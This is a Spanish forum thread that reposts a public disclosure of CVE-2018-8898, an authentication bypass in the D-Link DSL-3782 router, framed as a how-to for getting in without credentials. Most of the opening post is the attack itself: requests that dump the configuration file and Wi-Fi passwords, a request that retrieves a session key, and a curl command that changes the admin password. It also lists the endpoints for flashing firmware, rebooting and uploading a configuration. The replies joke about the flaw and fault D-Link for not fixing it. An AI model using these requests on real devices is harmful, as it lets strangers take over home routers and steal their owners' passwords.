Cómo entrar un D-Link DSL-3872 sin credenciales (CVE-2018-8898)

kcdtv · 21-05-2018 13:00:52

Cómo entrar en la interfaz de configuración de un D-Link DSL-3872 sin credenciales

fuente

D-Link DSL 3782 - Authentication Bypass by Giulio Comi @ packetsorms

El D-Link DSL-3872 es un modelo de doble banda con soporte ac.
No es un modelo de alta gama o de última generación pero tampoco está completamente desfasado.
Wireless AC1200 Dual Band VDSL ADSL Modem Router DSL‑3782
Vamos a ver juntos lo fácil que es saltarse los credenciales para tomar el control del dispositivo

Para obtener todas las contraseñas basta con entrar está petición en la barra del navegador

GET  http://192.168.1.1/romfile.cfg

Si lo que buscamos son solo las contraseñas wifi, podemos obtenerlas así:

Red b/g/n;

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_24.asp

Red ac:

GET http://192.168.1.1/cgi-bin/get/New_GUI/Settings_5.asp

Red invitados

GET http://192.168.1.1/cgi-bin/New_GUI/GuestZone.asp

Si queremos modificar la configuración directamente, una llave de sesión es necesaria.
Se obtiene así:

GET http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp

Una vez que tenemos a esta llave podemos emplearla para cambiar la configuración del dispositivo con peticiones POST.
Ejemplos:

Cambiar los credenciales de administrador de acceso a la interfaz web

curl --data "Password=[NEW_PASSWORD_SET_BY_THE_ATTACKER]" \
--data "sessionKey=$(curl -sS http://192.168.1.1/cgi-bin/get/New_GUI/get_sessionKey.asp)" \
http://192.168.1.1/cgi-bin/New_GUI/Set/Admin.asp

Cambiar las contraseñas wifi

POST http://192.168.1.1/cgi-bin/New_GUI/WiFi_loding.asp

Actualizar firmware

POST http://192.168.1.1/cgi-bin/New_GUI/Set/firmware_upgrade.asp

Forzar reboot

POST http://192.168.1.1/cgi-bin/New_GUI/Set/reboot_wait.asp

Subir una nueva configuración

POST /cgi-bin/New_GUI/Set/config_upgrade.asp

El problema, otra vez, es que D-Link no ha hecho nada tras haber sido advertido. pam
Otro problema es que la explotar la brecha es de lo más sencillo debido a la pésima programación del firmware.
El router es básicamente incapaz de distinguir las peticiones de un usuario debidamente identificado de las peticiones de un usuario ilegitimo.
Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link! roll

crash · 21-05-2018 13:13:08

vaya tela, ya solo le falta abrir la puerta de la cocina y traerte unas biere

kcdtv · 21-05-2018 13:18:42

Una lastima que los routers no tengan brazos y patas aún, sino sería posible con una "smart nevera" de estas conectada al PA. big_smile

josep345 · 21-05-2018 13:20:56

sheriff escribió:

Los propietarios de esta "joya" que tienen el acceso remoto habilitado tienen literalmente "el culo al aire"
¡Gracias D-Link!

Jajajajaja nunca mejor explicado Xd,a quien le gusta estar con el culo al aire,,,,buena información a tener muy en cuenta para los propietarios de dichos routers.

Tema	Respuestas	Vistas	Ultimo mensaje
Desautenticacion clientes 5GHZ por valdragas	3	310	Ayer 00:32:12 por kcdtv
Diferencias entre monX y wlanXmon por Hunter310#	3	219	17-02-2020 08:52:16 por kcdtv
Pegado: Pegado:: Script multiuso wifi para Kali y otras distros por v1s1t0r [ 1 2 3 … 15 ]	351	30700	09-02-2020 22:38:19 por v1s1t0r
Problema con la imagen en el GRUB por Hunter310#	5	219	07-02-2020 18:09:34 por kcdtv
Otro Mr Robot por Abrara	3	206	05-02-2020 16:39:50 por Abrara

Foro Wifi-libre.com

Anuncio

#1 21-05-2018 13:00:52